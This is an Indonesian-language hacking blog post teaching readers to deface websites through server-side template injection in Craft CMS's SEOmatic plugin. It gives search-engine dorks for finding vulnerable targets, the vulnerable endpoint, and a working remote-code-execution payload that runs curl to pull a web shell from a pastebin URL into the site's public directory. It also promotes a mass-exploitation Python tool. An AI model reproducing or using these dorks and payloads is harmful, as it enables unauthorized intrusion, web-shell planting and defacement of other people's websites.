SSTI (Server Side Template Injection) Rce Upload Shell

1
Hallo Sahabat, BLOG-GAN.ORG. Pada kesempatan kali ini saya akan membagikan tutorial deface SSTI ( Server Side Template Injection).
Okeh Daripada Bincang Bincang Tidak Membuahkan Hasil Langsung Saja Menujut Tutorialnya.
Dork : 
– inurl:/humans.txt intext:”Craft CMS”
– intext:SEOmatic filetype:txt
– site:*/humans.txt intext:SEOmatic
– /* TEAM */ inurl:/humans.txt
Kembangin Lagi Biar Lebih Maknyoss.
Exploit : 
/actions/seomatic/meta-container/all-meta-containers?uri=
Nah Untuk Langkah Selanjutnya Kalian Dorking Seperti Biasa Di Search Engine Seperti Google Atau Bing Terserah Kalian.

Nah Jika Sudah Melakukan Dorking ,Maka Disitu Akan Banyak Sekali Site Site Yang Dimana Nantinya Akan Kita Exploitasi.
Pilih Salah Satu Target Sobat . Selanjutnya Kalian Masukan Exploit ,Tepat Di Belakang Nama Domain
Contoh
 http://site.com//actions/seomatic/meta-container/all-meta-containers?uri=
Nah Jika Vuln Maka Akan Muncul Banyak Tulisan Seperti Gambar Di Bawah Ini !!!

Nah Sudah Menemukan Website Yang Vuln? Selanjutnya Kita Melakukan Rce Atau Remote Code Excution. 
{{craft.app.view.evaluateDynamicContent(%27print(system(%22curlx20https://pastebin.com/raw/Vqnc39ARx20%3Ex20php.php%22));%27)}}
Nah Untuk Melakukan Exploitnya Sebagai Contoh :
https://site.com//actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curlx20https://pastebin.com/raw/Vqnc39ARx20%3Ex20php.php%22));%27)}}
Nah Seperti Ini Kalian Bisa Mengubah Link Pastebin dan Juga extensi Shell kalian Sesuai Selera Masing Masing.
Dan Jika Sudah Melakukan Rce seperti Di Atas Selanjutnya Kalian Cek Shell Kalian . Oh Iya Shellnya Ada Di bagian /public_html/ 
Contoh : http://site.com/php.php
Nah Disini Mimin Juga Akan Membagikan Tools Mass Reverse SSTI (Server Side Template Injection) Disini Saya Menggunakan Source Code Python :3 
Kenapa Saya Membuat Tools Hanya Mass Reverse Bukan Langsung Upload Shell? Ya Karena Kemarin Saya Jalanin Tools Saya Yang Auto Upload Shell, Pas Di Buka Masih Ada Shellnya ,Pas Di Refresh  Shell Auto Kedelet :’v Jadi Kalian Manual Aja Biar Bisa Bypas Bypass  H3H3.
Berkeinginan  Mencobanya? Klik Disini Babe 
Tutorial Buat Jalaninnya Bisa Dilihat Di Bawah Sini !!!